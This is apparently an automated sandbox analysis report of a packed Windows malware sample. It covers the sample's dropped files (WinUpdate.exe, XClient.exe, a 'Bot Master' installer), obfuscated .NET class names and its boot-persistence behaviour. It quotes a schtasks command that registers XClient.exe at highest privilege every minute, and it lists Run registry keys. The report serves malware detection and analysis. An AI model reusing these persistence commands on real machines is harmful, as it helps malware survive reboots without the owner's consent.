                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00421743 memset,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateWindowExW,HeapAlloc,SetPropW,SendMessageW,SetWindowLongW,SetWindowPos,RedrawWindow,8_2_00421743
                  Source: Botmaster 5.8 direct.exe.0.drStatic PE information: section name: .code
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_00DE669A pushad ; iretd 0_2_00DE669D
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_013CF384 push 8B013B8Ah; ret 0_2_013CF389
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_0513B120 push 60050075h; iretd 0_2_0513B125
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_05135356 push esp; iretd 0_2_05135359
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeCode function: 0_2_0513A76A pushad ; iretd 0_2_0513A781
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0044007B push dword ptr [edx-27007A77h]; ret 8_2_00440087
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00411748 push eax; mov dword ptr [esp], FFFFFFFFh8_2_00411750
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0041171C push eax; mov dword ptr [esp], FFFFFFFFh8_2_0041171F
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0043E80C push esi; ret 8_2_0043E813
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0041195C push eax; mov dword ptr [esp], FFFFFFFFh8_2_0041195F
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00409A38 push eax; mov dword ptr [esp], 00000000h8_2_00409A3D
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00409B21 push eax; mov dword ptr [esp], E0E0E0E1h8_2_00409B2B
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_00431E00 push eax; ret 8_2_00431E2E
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0043DEC1 push esi; iretd 8_2_0043DEC3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 9_2_02961650 push esp; iretd 9_2_02961654
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0319F384 push 8B03188Ah; ret 14_2_0319F389
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322DE70 push C2337461h; ret 14_2_0322DE8A
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_0322669A pushad ; iretd 14_2_0322669D
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 14_2_06E75356 push esp; iretd 14_2_06E75359
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_00BF669A pushad ; iretd 19_2_00BF669D
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_0472F384 push 8B04718Ah; ret 19_2_0472F389
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_06292AD8 push 8B506B79h; retf 19_2_06292BF8
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_06295356 push esp; iretd 19_2_06295359
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_06294463 push dword ptr [esp+edx*2-75h]; iretd 19_2_062943F9
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeCode function: 19_2_0629B122 pushad ; iretd 19_2_0629B125
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_05B77380 push esp; iretd 26_2_05B7738D
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_05B75ADC push esp; iretd 26_2_05B7738D
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_069AEC22 push esp; retf 26_2_069AEC29
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0B67CFB1 push eax; mov dword ptr [esp], edx26_2_0B67CFC4
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BAA89E8 push eax; mov dword ptr [esp], ecx26_2_0BAA89EC
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 26_2_0BAA89D8 push eax; mov dword ptr [esp], ecx26_2_0BAA89EC
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, dEEQF7ZercM71VCd2h6.csHigh entropy of concatenated method names: 'TKGZ6Da5fS', 'yXkZBJyLeZ', 'BCVZRfb5hh', 'gnwZllRVa1', 'eXZZCaGQE3', 'ix9ZVd0JPc', 'WWpZWKVxh5', 'DofZ0uMIAL', 'e2vZvsUPT4', 'uQWZPK5gKI'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, WX0ecJbv7wIUuTO4CL.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'CaKqvB7sq', 'ToString', 'YPHk0qp5h', 'CAI49gdgI', 'uwvO35F0OCBYJSglL3t', 'MBBKyBFvaIWdakSMmh6', 'uMd2IUFVg4CRE4Ukw5S', 'BE9aKBFWp3iup6r0fJQ'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, drOWx3ijLnZNE87xld.csHigh entropy of concatenated method names: 'iTFUw1lwV', 'EyJLbqSbL', 'S5cOc9keT', 'r6Ln5sbFR', 'vxOASUbYF', 'X48oFc7Ee', 'eZtQEIgMv', 'ccgmldU7U', 'IcMzEZ1V7', 'M9ldhGo87T'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, fk8rUjdadEhfV31ndRJ.csHigh entropy of concatenated method names: 'J6LSamuSwU', 'p3jdhl3Fk8BTa7SdooK', 'u4hPy23EeG6bPWIwAqR', 'm6ppVo38nbFBf5jlNka', 'Di4rIM3xdEJGAEQkStc', 'DnxuYe3ZTH9YRyG1YVG', 'TJAIAd3gMheSNoJ31t9', 'lA6fvp3cjc4uaYv6wch', 'ngFBFY3HIS5rklFIOtE'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, dtUkAEdqlu9lYBqc0Yu.csHigh entropy of concatenated method names: 'JTlUa53N7IDQx5qQQjd', 'gAaKSq3soLUrX4kgoXF', 'X0DZZPcacp', 'EiiMCZ3YiKHJwAw0nLn', 'A3K4bW3yEmunqys3q30', 'krK7Lu3KQ1MQgRcWIAQ', 'yhVKfv35dulauAM9Bxf', 'qv63mG3fsytmJ8pKPsJ', 'v7O8lf3rMG3mcJwDhc5', 'D2KXYW3TcjtoOEYFPks'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, Messages.csHigh entropy of concatenated method names: 'uEVi6IH9DLHwnTxjEni', 'k7wkgyHPVu6T5NhXWu9', 'S6wGqsHtorbvUupG86c', 'OgdRyRHiRujlgrNrfG1', 'QuceqsH1LDj4oPgU0kq', 'mFdxPlHUgKBplwZckFB', 'vRYpuBHLaP5iQKNMgJX', 'tWu1YxHO2eE0SXcTR0e', 'EvKI3EHnngRYdmLkXXM', 'bgG3C1HA3f4Kx67MjVE'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, AlgorithmAES.csHigh entropy of concatenated method names: 'Decrypt', 'O5uLygc6SY0yksNGXsM', 'a8I6jXcuc9CnnAyu7hj', 'jFThSbcMmG40cGogKFG', 'Kcuf8YcBgK1tiDtyWR3', 'T6y1lscRd5J38fdlfqa', 'KWIO39clW4q8BD7px6Z', 'JZKeJ3cCKB4qoiBMIgj', 'UMAqMBcVmOK3G37ryJS', 'vIDYbHcWltHXA0AY7fq'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, ClientSocket.csHigh entropy of concatenated method names: 'BeginConnect', 'ConnectServer', 'Info', 'INDATE', 'Spread', 'UAC', 'Antivirus', 'GPU', 'CPU', 'RAM'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, Uninstaller.csHigh entropy of concatenated method names: 'UNS', 'E7HhLjcxwQn4V8R8q0s', 'MBpx7dchRNjnEwkBAlt', 'rn6luQcdNy4qT92GwN7', 'e7pPFMcZNnpPDT5vmKH', 'Ojg1ZpcFIRbfdlWvKUg', 'rF34INcEMHgoSlQ3shY', 'H4dqZ0c8rqhJHrThD6y', 'QspTAVcgyrIxHS8u3lt', 'YFw1QXcc6t0DJAU5lUh'
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, Main.csHigh entropy of concatenated method names: 'Main', 'TouOglEdZbvmrxpBU0D', 'TaLIcDFzSRrXpQJsm5E', 'vCiYCwEhSt4oygS6uOy', 'RmRr7sExQBjgkah1Na4', 'Wvs38uEZuFguDNr96sr', 'CTAPleEFFZpWDF0LlOC', 'WsgUB1EEI2yhiIZZcFc', 'kqDHemE8RtKWLgOIUDN'
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\System.Memory.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\System.Buffers.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.Shell.Interop.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeFile created: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Json.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.OLE.Interop.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\System.Numerics.Vectors.dllJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeFile created: C:\Users\user\AppData\Local\WinUpdate.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\app.publish\BotMaster.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\System.ValueTuple.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Newtonsoft.Json.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.VisualStudio.TextManager.Interop.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\System.Threading.Tasks.Extensions.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-x64\native\WebView2Loader.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-arm64\native\WebView2Loader.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\runtimes\win-x86\native\WebView2Loader.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\System.Text.Encodings.Web.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile created: C:\Program Files (x86)\Bot Master\Bot Master\Microsoft.Web.WebView2.Wpf.dllJump to dropped file

                  Boot Survival

                  barindex
                  Creates multiple autostart registry keys
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdateJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdateJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinUpdateJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_004247C0 GetWindow,SetActiveWindow,IsZoomed,IsIconic,ShowWindow,8_2_004247C0
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\D398D5DE8ED385CA18AA 0EE68C8008E2A8D6252DB3D3B1A1B0179E1F868B0B3240BBCEC3D1C29D5364FBJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
